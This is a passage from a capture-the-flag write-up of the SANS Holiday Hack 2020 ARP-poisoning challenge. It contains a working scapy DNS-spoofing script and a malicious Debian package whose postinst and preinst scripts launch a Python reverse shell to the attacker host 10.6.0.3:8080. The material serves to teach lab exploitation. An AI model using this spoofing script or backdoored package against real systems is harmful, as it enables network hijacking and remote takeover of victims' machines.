&lt;span class="go"&gt;  ra        = 0&lt;/span&gt;
&lt;span class="go"&gt;  z         = 0&lt;/span&gt;
&lt;span class="go"&gt;  ad        = 0&lt;/span&gt;
&lt;span class="go"&gt;  cd        = 0&lt;/span&gt;
&lt;span class="go"&gt;  rcode     = ok&lt;/span&gt;
&lt;span class="go"&gt;  qdcount   = 1&lt;/span&gt;
&lt;span class="go"&gt;  ancount   = 0&lt;/span&gt;
&lt;span class="go"&gt;  nscount   = 0&lt;/span&gt;
&lt;span class="go"&gt;  arcount   = 0&lt;/span&gt;
&lt;span class="go"&gt;  \qd        \&lt;/span&gt;
&lt;span class="go"&gt;   |###[ DNS Question Record ]###&lt;/span&gt;
&lt;span class="go"&gt;   |  qname     = &amp;#39;www.netbsd.org.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;   |  qtype     = A&lt;/span&gt;
&lt;span class="go"&gt;   |  qclass    = IN&lt;/span&gt;
&lt;span class="go"&gt;  an        = None&lt;/span&gt;
&lt;span class="go"&gt;  ns        = None&lt;/span&gt;
&lt;span class="go"&gt;  ar        = None&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;dns_response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DNS&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;show&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="go"&gt;###[ DNS ]###&lt;/span&gt;
&lt;span class="go"&gt;  id        = 30144&lt;/span&gt;
&lt;span class="go"&gt;  qr        = 1&lt;/span&gt;
&lt;span class="go"&gt;  opcode    = QUERY&lt;/span&gt;
&lt;span class="go"&gt;  aa        = 0&lt;/span&gt;
&lt;span class="go"&gt;  tc        = 0&lt;/span&gt;
&lt;span class="go"&gt;  rd        = 1&lt;/span&gt;
&lt;span class="go"&gt;  ra        = 1&lt;/span&gt;
&lt;span class="go"&gt;  z         = 0&lt;/span&gt;
&lt;span class="go"&gt;  ad        = 0&lt;/span&gt;
&lt;span class="go"&gt;  cd        = 0&lt;/span&gt;
&lt;span class="go"&gt;  rcode     = ok&lt;/span&gt;
&lt;span class="go"&gt;  qdcount   = 1&lt;/span&gt;
&lt;span class="go"&gt;  ancount   = 1&lt;/span&gt;
&lt;span class="go"&gt;  nscount   = 0&lt;/span&gt;
&lt;span class="go"&gt;  arcount   = 0&lt;/span&gt;
&lt;span class="go"&gt;  \qd        \&lt;/span&gt;
&lt;span class="go"&gt;   |###[ DNS Question Record ]###&lt;/span&gt;
&lt;span class="go"&gt;   |  qname     = &amp;#39;www.netbsd.org.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;   |  qtype     = A&lt;/span&gt;
&lt;span class="go"&gt;   |  qclass    = IN&lt;/span&gt;
&lt;span class="go"&gt;  \an        \&lt;/span&gt;
&lt;span class="go"&gt;   |###[ DNS Resource Record ]###&lt;/span&gt;
&lt;span class="go"&gt;   |  rrname    = &amp;#39;www.netbsd.org.&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;   |  type      = A&lt;/span&gt;
&lt;span class="go"&gt;   |  rclass    = IN&lt;/span&gt;
&lt;span class="go"&gt;   |  ttl       = 82159&lt;/span&gt;
&lt;span class="go"&gt;   |  rdlen     = None&lt;/span&gt;
&lt;span class="go"&gt;   |  rdata     = 204.152.190.12&lt;/span&gt;
&lt;span class="go"&gt;  ns        = None&lt;/span&gt;
&lt;span class="go"&gt;  ar        = None&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the DNS response shares a lot of attributes with the DNS
request:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;They have the same &lt;code&gt;id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The response contains a copy of the DNS request in the &lt;code&gt;qd&lt;/code&gt; attribute&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can also see that:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;qr&lt;/code&gt; is set to 1.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ra&lt;/code&gt; is set to 1.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ancount&lt;/code&gt; is set to 1.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;an&lt;/code&gt; contains a DNS Resource Record (the class &lt;code&gt;DNSRR&lt;/code&gt; in scapy).
Inside this response, &lt;code&gt;rrname&lt;/code&gt; is the same as the request's
&lt;code&gt;qname&lt;/code&gt; attribute.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;an.rdata&lt;/code&gt; contains the IP address the domain name resolves to.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With all this, we can complete our Python script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/python3&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;scapy.all&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;netifaces&lt;/span&gt; &lt;span class="kn"&gt;as&lt;/span&gt; &lt;span class="nn"&gt;ni&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;uuid&lt;/span&gt;
&lt;span class="c1"&gt;# Our eth0 IP&lt;/span&gt;
&lt;span class="n"&gt;ipaddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ni&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ifaddresses&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;eth0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="n"&gt;ni&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;addr&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="c1"&gt;# Our Mac Addr&lt;/span&gt;
&lt;span class="n"&gt;macaddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;get_if_hwaddr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;eth0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="c1"&gt;# destination ip we arp spoofed&lt;/span&gt;
&lt;span class="n"&gt;ipaddr_we_arp_spoofed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;10.6.6.53&amp;#39;&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;handle_dns_request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# Need to change mac addresses, Ip Addresses, and ports below.&lt;/span&gt;
    &lt;span class="c1"&gt;# We also need&lt;/span&gt;
    &lt;span class="n"&gt;eth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Ether&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;macaddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# The source MAC address is our own, the destination is from the packet&lt;/span&gt;
    &lt;span class="n"&gt;ip&lt;/span&gt;  &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;IP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ipaddr_we_arp_spoofed&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# The source IP is the one we spoofed, the destination is from the packet&lt;/span&gt;
    &lt;span class="n"&gt;udp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;UDP&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# We simply invert the source and destination ports from the original packet&lt;/span&gt;
    &lt;span class="n"&gt;dns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;DNS&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="nb"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DNS&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;ra&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;ancount&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;qd&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DNS&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;qd&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="c1"&gt;# we get a copy of the request from the original packet&lt;/span&gt;
            &lt;span class="n"&gt;an&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;DNSRR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rrname&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DNS&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;qd&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;qname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ttl&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;82159&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;rdata&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ipaddr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# here, we resolve to our own IP address&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;dns_response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;eth&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;ip&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;udp&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;dns&lt;/span&gt;
    &lt;span class="n"&gt;sendp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dns_response&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;iface&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;eth0&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;berkeley_packet_filter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot; and &amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;udp dst port 53&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                              &lt;span class="c1"&gt;# dns&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;udp[10] &amp;amp; 0x80 = 0&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                           &lt;span class="c1"&gt;# dns request&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;dst host {}&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ipaddr_we_arp_spoofed&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;    &lt;span class="c1"&gt;# destination ip we had spoofed (not our real ip)&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;ether dst host {}&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;macaddr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;             &lt;span class="c1"&gt;# our macaddress since we spoofed the ip to our mac&lt;/span&gt;
    &lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# sniff the eth0 int without storing packets in memory and stopping after one dns request&lt;/span&gt;
    &lt;span class="n"&gt;sniff&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;filter&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;berkeley_packet_filter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prn&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;handle_dns_request&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;store&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;iface&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;eth0&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;__main__&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's perform both ARP and DNS poisoning, while performing a network
capture:&lt;/p&gt;
&lt;p&gt;In a term:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/pcaps$&lt;/span&gt; tcpdump -i eth0 -w arp_dns_poisoning.pcap
&lt;span class="go"&gt;tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In another:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/scripts$&lt;/span&gt; ./dns_resp.py
&lt;span class="go"&gt;.&lt;/span&gt;
&lt;span class="go"&gt;Sent 1 packets.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In yet another:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~/scripts$&lt;/span&gt; ./arp_resp.py
&lt;span class="go"&gt;.&lt;/span&gt;
&lt;span class="go"&gt;Sent 1 packets.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's a link to &lt;a class="reference external" href="/docs/sans-christmas-challenge-2020/arp_dns_poisoning.pcap"&gt;arp_dns_poisoning.pcap&lt;/a&gt;.&lt;/p&gt;
&lt;img alt="arp_shenanigans_arp_dns_poisoning.png" class="align-center" src="/images/sans-christmas-challenge-2020/arp_shenanigans_arp_dns_poisoning.png" /&gt;
&lt;p&gt;Our script properly responded to the DNS request, and sent an answer saying
that ftp.osuosl.org resolves to 10.6.0.3, which is the IP address of our own
machine. We can then see that the hijacked machine tries to connect to our
machine on TCP port 80. Since our port is closed, we send a &lt;code&gt;RST&lt;/code&gt; packet.
There's also a bunch of TLS traffic that we won't look at right now.&lt;/p&gt;
&lt;p&gt;TCP/80 is associated to HTTP traffic, so the hijacked machine is probably
trying to connect to an HTTP server. Let's spin up a simple HTTP server, and
perform our poisoning attacks again:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; python3 -m http.server &lt;span class="m"&gt;80&lt;/span&gt;
&lt;span class="go"&gt;Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...&lt;/span&gt;
&lt;span class="go"&gt;10.6.6.35 - - [31/Dec/2020 12:15:09] code 404, message File not found&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;10.6.6.35 - - [31/Dec/2020 12:15:09] &amp;quot;GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1&amp;quot; 404 -&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The hijacked machine tries to download the file &lt;code&gt;/pub/jfrost/backdoor/suriv_amd64.deb&lt;/code&gt;
Debian package (&amp;quot;suriv&amp;quot; is &amp;quot;virus&amp;quot; backwards, super sneaky).&lt;/p&gt;
&lt;p&gt;Now that is great news! The hijacked machine is probably trying to update its
virus, and is downloading a &lt;code&gt;.deb&lt;/code&gt; file, which it will probably try
to install using &lt;code&gt;dpkg&lt;/code&gt;. If we replace &lt;code&gt;suriv_amd64.deb&lt;/code&gt; by a
&lt;code&gt;.deb&lt;/code&gt; of our own making, we could gain code execution on the hijacked
machine!&lt;/p&gt;
&lt;p&gt;But we don't have the original &lt;code&gt;suriv_amd64.deb&lt;/code&gt; so how can we modify it?
We don't know how the original package works, so how can we be sure that our
executable will be properly launched?&lt;/p&gt;
&lt;p&gt;Well, turns out, we don't need the original package. Indeed, &lt;code&gt;.deb&lt;/code&gt;
packages can embed scripts that will be launched before/after
installation/removal. So, we can build a barebone &lt;code&gt;.deb&lt;/code&gt; package, with
only a post-install script.&lt;/p&gt;
&lt;p&gt;I used this &lt;a class="reference external" href="https://www.internalpointers.com/post/build-binary-deb-package-practical-guide"&gt;handy guide&lt;/a&gt;
on how to build &lt;code&gt;.deb&lt;/code&gt; packages, I suggest you read it. I first tried to
put my payload in the &lt;code&gt;preinst&lt;/code&gt; script, but it was never executed on our
target machine, despite it working on my test machine. However, using both
&lt;code&gt;preinst&lt;/code&gt; and &lt;code&gt;postinst&lt;/code&gt; works. If anyone knows why one set-up
works and the other doesn't, I'm interested!&lt;/p&gt;
&lt;p&gt;Now, what can we use as a payload? Well, remember the TLS traffic we saw
between our machine and the hijacked machine? Turns out, the hijacked machine
has a TLS server listening on TCP port 64352:&lt;/p&gt;
&lt;img alt="arp_shenanigans_tls.png" class="align-center" src="/images/sans-christmas-challenge-2020/arp_shenanigans_tls.png" /&gt;
&lt;p&gt;Let's try to connect to it using OpenSSL:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; openssl s_client -connect &lt;span class="m"&gt;10&lt;/span&gt;.6.6.35:64352
&lt;span class="go"&gt;CONNECTED(00000003)&lt;/span&gt;
&lt;span class="go"&gt;Can&amp;#39;t use SSL_get_servername&lt;/span&gt;
&lt;span class="go"&gt;depth=0 C = US, ST = bla, L = asdf, O = asdf, OU = asdf, CN = asdf, emailAddress = asdf&lt;/span&gt;
&lt;span class="go"&gt;verify error:num=18:self signed certificate&lt;/span&gt;
&lt;span class="go"&gt;verify return:1&lt;/span&gt;
&lt;span class="go"&gt;depth=0 C = US, ST = bla, L = asdf, O = asdf, OU = asdf, CN = asdf, emailAddress = asdf&lt;/span&gt;
&lt;span class="go"&gt;verify return:1&lt;/span&gt;
&lt;span class="go"&gt;---&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;test&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;!DOCTYPE HTML PUBLIC &amp;quot;-//W3C//DTD HTML 4.01//EN&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;http://www.w3.org/TR/html4/strict.dtd&amp;quot;&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    &amp;lt;head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        &amp;lt;meta http-equiv=&amp;quot;Content-Type&amp;quot; content=&amp;quot;text/html;charset=utf-8&amp;quot;&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        &amp;lt;title&amp;gt;Error response&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    &amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    &amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        &amp;lt;h1&amp;gt;Error response&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        &amp;lt;p&amp;gt;Error code: 400&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        &amp;lt;p&amp;gt;Message: Bad request syntax (&amp;#39;test&amp;#39;).&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        &amp;lt;p&amp;gt;Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    &amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;read:errno=0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Seems to be an HTTPS server, with a self-signed certificate, let's confirm it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; curl -i -k https://10.6.6.35:64352
&lt;span class="go"&gt;HTTP/1.0 404 NOT FOUND&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 232&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Server: Werkzeug/1.0.1 Python/3.8.5&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Date: Thu, 31 Dec 2020 12:36:28 GMT&lt;/span&gt;

&lt;span class="go"&gt;&amp;lt;!DOCTYPE HTML PUBLIC &amp;quot;-//W3C//DTD HTML 3.2 Final//EN&amp;quot;&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;title&amp;gt;404 Not Found&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;h1&amp;gt;Not Found&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;p&amp;gt;The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It's indeed an HTTPS server, using the &lt;a class="reference external" href="https://pypi.org/project/Werkzeug/"&gt;Werkzeug Python library&lt;/a&gt;.
So, we can suppose that our target machine has Python3 installed. Therefore,
we can use Python3 to get our reverse shell.&lt;/p&gt;
&lt;p&gt;Let's build our malicious &lt;code&gt;.deb&lt;/code&gt;!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; mkdir -p suriv_amd64/DEBIAN
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's put a fake &lt;code&gt;control&lt;/code&gt; file, as well as our payload-holding
&lt;code&gt;preinst&lt;/code&gt; and &lt;code&gt;postinst&lt;/code&gt; scripts:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; cat suriv_amd64/DEBIAN/control
&lt;span class="go"&gt;Package: suriv&lt;/span&gt;
&lt;span class="go"&gt;Version: 1.0&lt;/span&gt;
&lt;span class="go"&gt;Architecture: amd64&lt;/span&gt;
&lt;span class="go"&gt;Maintainer: Jack Frost &amp;lt;jack@frost.com&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Description: Suriv package from Jack Frost&lt;/span&gt;
&lt;span class="go"&gt; Totally not a backdoor&lt;/span&gt;
&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; chmod +x suriv_amd64/DEBIAN/postinst &lt;span class="c1"&gt;# we must make sure the script is executable&lt;/span&gt;
&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; cat suriv_amd64/DEBIAN/postinst
&lt;span class="gp"&gt;#&lt;/span&gt;!/bin/sh

&lt;span class="go"&gt;python3 -c &amp;#39;import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&amp;quot;10.6.0.3&amp;quot;,8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&amp;quot;/bin/bash&amp;quot;)&amp;#39;&lt;/span&gt;
&lt;span class="gp"&gt;guest@e25a4aa6f87a:~$&lt;/span&gt; cp suriv_amd64/DEBIAN/postinst suriv_amd64/DEBIAN/preinst
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's package it:&lt;/p&gt;
